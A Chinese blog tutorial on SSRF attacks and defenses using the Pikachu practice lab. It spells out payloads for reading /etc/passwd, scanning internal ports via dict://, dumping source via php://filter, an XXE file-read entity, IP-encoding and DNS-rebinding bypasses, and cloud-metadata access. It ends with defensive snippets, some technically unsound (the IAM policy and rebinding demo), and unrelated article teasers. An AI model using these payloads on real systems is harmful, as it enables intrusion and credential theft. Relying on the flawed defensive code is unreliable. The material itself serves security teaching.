当前位置: 首页 > article >正文

SSRF漏洞实战:用Pikachu靶场玩转curl_exec和file_get_contents攻击链

SSRF漏洞攻防实战从Pikachu靶场到企业级防御体系当你在浏览器地址栏输入?urlfile:///etc/passwd并成功读取系统文件时服务器就像一位过于热心的管家将保险柜钥匙交给了陌生人。这就是SSRFServer-Side Request Forgery漏洞的魔力——让服务器成为攻击者的代理机器人。本文将带你深入这个既危险又有趣的漏洞世界。1. SSRF漏洞核心原理剖析SSRF的本质是服务器信任边界被突破。当Web应用未对用户提供的URL进行严格校验时攻击者就能操纵服务器向任意地址发起请求。就像让邮差误把伪造的取件单当成内部指令从而取回本不该外流的包裹。关键危险函数家族// 网络请求组 $response curl_exec($ch); // cURL家族 $content file_get_contents($url); // 文件读取组 $handle fopen($url, r); // 文件操作组 // 套接字通信组 $fp fsockopen(internal.db, 3306); $data readfile(http://internal/api);这些函数就像服务器对外开放的遥控接口当它们与用户输入直接耦合时就会形成典型的SSRF漏洞触发点。特别值得注意的是不同协议支持的函数存在差异协议类型支持函数典型攻击场景file://file_get_contents/fopen本地文件读取dict://curl_exec端口扫描/服务指纹识别gopher://fsockopen构造任意TCP流量攻击内网服务提示现代云环境中SSRF的危害被放大百倍。通过访问云元数据接口如169.254.169.254攻击者可能直接获取IAM凭证接管整个云环境。2. Pikachu靶场深度实战2.1 环境配置与调试技巧搭建Pikachu靶场时常遇到404问题的根本原因是路径解析差异。不同于原文提到的修改方案更可靠的解决方法是检查Apache/Nginx的AllowOverride设置确认mod_rewrite模块已启用在.htaccess中添加重定向规则IfModule mod_rewrite.c RewriteEngine On RewriteBase /pikachu/ RewriteRule ^ssrf/(.*)$ ssrf_$1.php [L] /IfModule2.2 cURL模块攻击链构建curl_exec的协议支持就像瑞士军刀般多样。在Pikachu的SSRF(curl)关卡中我们可以进行多维攻击内网服务探测三部曲端口扫描?urldict://192.168.1.1:22通过响应时间判断SSH服务服务指纹?urldict://redis:6379/info获取Redis版本信息API探测?urlhttp://internal-api/admin尝试访问管理接口高级利用技巧# 使用CRLF注入绕过基础过滤 curl -v http://target/ssrf.php?urlhttp://127.0.0.1%0d%0aX-Forwarded-For:%20192.168.1.1002.3 file_get_contents的另类利用当遇到file_get_contents时除了常规的文件读取还可以使用PHP包装器获取源码?filephp://filter/convert.base64-encode/resourceconfig.php通过压缩流绕过扩展名检查?filecompress.zlib:///var/www/backups/2023.sql.gz结合XXE进行混合攻击当允许XML上传时!ENTITY xxe SYSTEM php://filter/readconvert.base64-encode/resource/etc/passwd3. 企业级防御方案设计3.1 防御矩阵构建有效的SSRF防护需要分层防御体系输入校验层正则白名单校验/^https?:\/\/[a-z0-9.-]\.example\.com/i禁用危险协议在php.ini中设置allow_url_fopenOff网络隔离层location /internal/ { deny all; return 403; }请求过滤层def safe_request(url): if urlparse(url).hostname in INTERNAL_IPS: raise SecurityException(Internal network access denied) if urlparse(url).port not in [80, 443]: raise SecurityException(Non-standard port detected)3.2 云环境特殊防护针对AWS/Aliyun等云平台元数据服务加固# 使用iptables限制元数据访问 iptables -A OUTPUT -d 169.254.169.254 -j DROPIAM策略最小化{ Version: 2012-10-17, Statement: [{ Effect: Deny, Action: *, Resource: *, Condition: { IpAddress: {aws:SourceIp: 169.254.169.254} } }] }4. 高级攻击手法与绕过艺术4.1 DNS重绑定攻击当目标检查IP黑名单时可以通过DNS TTL控制实现IP切换注册域名并设置极短TTL如1秒首次解析返回合法外网IP在服务器发起请求时DNS返回内网IP# DNS重绑定模拟器 from flask import Flask app Flask(__name__) app.route(/) def toggle_ip(): return 192.168.1.1 if request.args.get(rebind) else 8.8.8.84.2 协议混淆技巧利用URL解析差异绕过过滤十进制IP编码http://2130706433127.0.0.1十六进制编码http://0x7f000001省略写法http://127.1→127.0.0.14.3 服务端请求走私通过畸形请求触发服务器解析差异POST /api/ssrf HTTP/1.1 Host: target.com Content-Length: 56 GET /admin HTTP/1.1 Host: internal-api X-Forwarded-For: 127.0.0.1在实战中我曾遇到一个案例某电商平台通过限制file://协议防御SSRF但攻击者使用compress.zlib://file:///etc/passwd成功绕过。这提醒我们防御方案需要协议组合测试。

相关文章:

SSRF漏洞实战:用Pikachu靶场玩转curl_exec和file_get_contents攻击链

SSRF漏洞攻防实战:从Pikachu靶场到企业级防御体系 当你在浏览器地址栏输入?urlfile:///etc/passwd并成功读取系统文件时,服务器就像一位过于热心的管家,将保险柜钥匙交给了陌生人。这就是SSRF(Server-Side Request Forgery&#…...

【仿真】【具身智能】云端低成本畅玩Isaac Lab:抢占式实例部署实战

1. 为什么选择云端抢占式实例部署Isaac Lab 第一次接触Isaac Lab时,我和大多数开发者一样被本地部署的高门槛吓退了。一张RTX 3090显卡就要上万元,更别提配套的CPU和内存配置要求。后来尝试过VNC远程连接方案,结果画面卡顿得像在看PPT&#x…...

VSG并联系统振荡了?从根轨迹和参与因子分析稳定性(实例详解)

VSG并联系统振荡问题诊断:从根轨迹到参与因子的工程实践指南 当三台VSG并联系统在实验室首次同步运行时,我们观察到了令人不安的2.4Hz持续功率振荡。这种低频振荡不仅导致功率分配失衡,更威胁着整个微电网的稳定运行。作为从业十二年的电力电…...

Stalwart邮件服务器架构设计与性能调优深度解析

Stalwart邮件服务器架构设计与性能调优深度解析 【免费下载链接】stalwart Secure & Modern All-in-One Mail Server (IMAP, JMAP, SMTP) 项目地址: https://gitcode.com/GitHub_Trending/ma/stalwart 在现代化邮件系统部署中,企业面临的核心挑战是如何在…...

Chatbot Arena榜单地址解析:如何高效获取与利用开源大模型评测数据

Chatbot Arena榜单地址解析:如何高效获取与利用开源大模型评测数据 作为一名AI开发者,你是否也经历过这样的“选型阵痛”?面对琳琅满目的开源大模型,从Llama、Mistral到Qwen、DeepSeek,每个模型都宣称自己性能卓越。但…...

基于SpringBoot的宠物寄养系统实战:从毕设开题到可运行原型

最近在辅导学弟学妹做毕业设计,发现很多同学在做“宠物寄养系统”这类项目时,虽然功能列了一大堆,但代码写出来总觉得差点意思,要么是业务逻辑全堆在Controller里,要么是数据状态管理混乱,答辩时被老师一问…...

5种数字内容访问优化技术:从原理到实战的全方位指南

5种数字内容访问优化技术:从原理到实战的全方位指南 【免费下载链接】bypass-paywalls-chrome-clean 项目地址: https://gitcode.com/GitHub_Trending/by/bypass-paywalls-chrome-clean 在信息驱动的数字时代,高效获取优质内容已成为知识工作者的…...

ThreadX信号量五大使用误区盘点:你的RTOS同步机制真的安全吗?

ThreadX信号量五大使用误区盘点:你的RTOS同步机制真的安全吗? 在嵌入式实时系统开发中,信号量作为最基础的同步机制之一,其重要性不言而喻。ThreadX作为一款商业级RTOS,其信号量实现看似简单,却暗藏诸多陷阱…...

深入解析W25Q64:SPI接口下的高效存储解决方案

1. W25Q64闪存芯片初探:为什么它成为嵌入式开发的首选? 第一次接触W25Q64是在五年前的一个智能家居项目里,当时需要存储大量设备配置和日志数据。这个指甲盖大小的芯片让我印象深刻——它不仅容量达到8MB,还能在断电后完整保存数据…...

终极开源方案:一站式多媒体内容采集与智能管理利器

终极开源方案:一站式多媒体内容采集与智能管理利器 【免费下载链接】MediaCrawler-new 项目地址: https://gitcode.com/GitHub_Trending/me/MediaCrawler-new MediaCrawler是一款功能强大的开源多媒体内容采集工具,专为高效获取和管理网络多媒体…...

OpenCore Legacy Patcher:老旧Mac硬件适配与系统兼容完整指南

OpenCore Legacy Patcher:老旧Mac硬件适配与系统兼容完整指南 【免费下载链接】OpenCore-Legacy-Patcher 体验与之前一样的macOS 项目地址: https://gitcode.com/GitHub_Trending/op/OpenCore-Legacy-Patcher 你是否还在为2012年之前的Mac无法升级到最新macO…...

虚幻引擎登录界面常见BUG排查手册:解决UI显示与事件调度器问题

虚幻引擎登录界面开发实战:从UI异常到事件调度的深度解决方案 登录界面作为用户接触产品的第一道门户,其稳定性和交互体验直接影响用户对产品的第一印象。在虚幻引擎开发中,从UI控件渲染到事件逻辑处理,每个环节都可能隐藏着意想不…...

Cadence OrCAD 16.6自带库文件大盘点:从Amplifier到Transistor,新手别再用错库了!

Cadence OrCAD 16.6自带库文件深度解析:从分类逻辑到实战避坑指南 刚接触OrCAD的新手工程师们,打开软件后面对几十个后缀为.olb的库文件时,往往会有种站在图书馆却找不到书的茫然感。每个库文件名称看似直白,但当你真正需要找一个…...

不止是编译:深入理解OpenHarmony XTS测试套件(acts/hats/dcts)与你的代码质量守护

不止是编译:深入理解OpenHarmony XTS测试套件与代码质量守护 在OpenHarmony生态系统中,代码质量保障从来不是简单的编译通过就能解决的问题。当我们谈论XTS测试套件时,很多开发者第一反应是"如何编译运行",却忽略了这套…...

Rust的trait对象大小与动态分发在虚函数表实现上的差异

Rust作为一门现代系统编程语言,其独特的trait对象和动态分发机制在性能与灵活性之间取得了巧妙平衡。与C等语言的虚函数表实现相比,Rust的trait对象在内存布局和分发逻辑上展现出显著差异,这些差异直接影响着程序的内存使用效率和运行时行为。…...

flac3d台阶法开挖命令流,5.0版本,计算结果有效合理,支护方式为初衬单元与锚杆联合支护...

flac3d台阶法开挖命令流,5.0版本,计算结果有效合理,支护方式为初衬单元与锚杆联合支护,初衬采用shell单元,锚杆为cable单元,可为相关计算提供参考 直接开整吧!最近在搞隧道台阶法开挖模拟&#…...

FreeSWITCH mod_vad模块实战:手把手教你用Python ESL实现通话静音检测与智能录音

FreeSWITCH mod_vad模块实战:Python ESL实现智能语音检测与动态录音控制 在语音通信系统中,精准识别通话双方的语音活动状态是实现智能交互的基础能力。传统录音方案往往采用全程录制模式,不仅浪费存储资源,后期分析时还需要人工筛…...

【PAT甲级真题】- Speech Patterns (25)

题目来源 Speech Patterns (25) 题目描述点击链接自行查看 注意点: 字母不区分大小写多个答案输出最小字典序的那个 思路简介 简单的哈希表 按照题目的要求搜索到一个单词后就把它放到哈希表当中 然后维护出现次数最多的单词和它的数量即可 遇到的问题 大小写转…...

揭秘AI_NovelGenerator:重构长篇小说创作的智能架构

揭秘AI_NovelGenerator:重构长篇小说创作的智能架构 【免费下载链接】AI_NovelGenerator 使用ai生成多章节的长篇小说,自动衔接上下文、伏笔 项目地址: https://gitcode.com/GitHub_Trending/ai/AI_NovelGenerator 传统长篇小说创作面临三大核心痛…...

ABAQUS三维多孔材料建模:自定义与多软件导出

ABAQUS三维多孔材料,可生成实体多孔材料空隙连接或六面体网格映射模型。 可自定义参数包括基体长宽高,骨料半径范围,体积比以及网格的尺寸。 可导出到comsol ansys cad等。最近在研究ABAQUS三维多孔材料建模,发现了一些超有趣的功…...

杰理之内置触摸拓扑结构【篇】

低功耗内置触摸检测模块,简称lp_ctmu模块,是利用检测人体分布电容对触摸按键电容的影响,通过检测该电容变化,达到按键识别的功能...

终极浏览器3D高斯点云编辑器:SuperSplat完整指南与5大核心优势

终极浏览器3D高斯点云编辑器:SuperSplat完整指南与5大核心优势 【免费下载链接】super-splat 3D Gaussian Splat Editor 项目地址: https://gitcode.com/gh_mirrors/su/super-splat 在3D视觉与点云处理领域,传统桌面软件的高门槛正被一款创新的We…...

独立转向轮式机器人避障轨迹规划策略:应对未知地形与突发空中障碍

独立转向轮式机器人避障轨迹规划策略 (应对未知地形和突发空中障碍) 1、改进动态窗口法(采样策略和评价策略) 2、基于模糊规则的自适应权重策略 (程序完整,注释详细,可供相关方向研究生借鉴参考…...

Coze智能客服部署指南:从零搭建到生产环境最佳实践

最近在折腾智能客服系统的部署,发现市面上虽然方案不少,但真正能兼顾快速落地、稳定运行和成本可控的并不多。Coze 作为一个新兴的选项,以其灵活的架构和不错的性能吸引了我。经过一番从零到生产环境的摸索,我总结了一套部署指南&…...

EPLAN P8 2024高效操作指南:从设备标识到端子排连接

1. EPLAN P8 2024设备标识符管理实战 电气设计中最让人头疼的就是设备标识符管理了。记得我刚接触EPLAN时,光是给几百个元件编号就花了一整天,还经常出现重复或遗漏。EPLAN P8 2024在这方面做了重大改进,现在用设备标识符包含页面功能&#x…...

红海跟风:为何亚马逊上“更好的产品”往往死得最快

在亚马逊这片由算法和心智认知共同统治的战场上,无数跟随者都死于同一种“绝症”:相信只要产品比领导者“更好”,就理应获得成功。​ 他们投入大量时间优化参数、增加无关紧要的功能、或进行微弱的降价,却将最宝贵的“时机”和“心…...

工具链设计进阶:RAG-MCP混合架构与海量工具智能选择

工具链设计进阶:RAG-MCP混合架构与海量工具智能选择 写在前面:当你的MCP生态从几个工具扩展到几十甚至上百个工具时,一个严峻的问题浮现了——LLM在选择工具时开始"迷失"。传统方式把所有工具描述都塞进Prompt的做法,在…...

6ES5943-7UB21西门子中央处理器模块

型号全称:西门子 SIMATIC S5-115U CPU 943B 中央处理器模块订货号:6ES5943-7UB21一、产品特性属于SIMATIC S5-115U系列中型 PLC 中央处理单元型号为CPU 943B,自带48KB RAM工作内存配备2 路 TTY 通信接口,支持编程器 / 上位机连接带…...

NE555定时器电路设计:从LED闪烁到电机调速的5个实用项目

NE555定时器电路设计:从LED闪烁到电机调速的5个实用项目 在电子设计的世界里,NE555就像是一把瑞士军刀——小巧、多功能且无处不在。这款诞生于1971年的定时器芯片,至今仍然是电子爱好者和工程师们的最爱。它价格低廉、使用简单,却…...

Blender置换贴图终极指南:5步让3D模型瞬间拥有真实细节

Blender置换贴图终极指南:5步让3D模型瞬间拥有真实细节 【免费下载链接】awesome-blender 🪐 A curated list of awesome Blender addons, tools, tutorials; and 3D resources for everyone. 项目地址: https://gitcode.com/GitHub_Trending/aw/aweso…...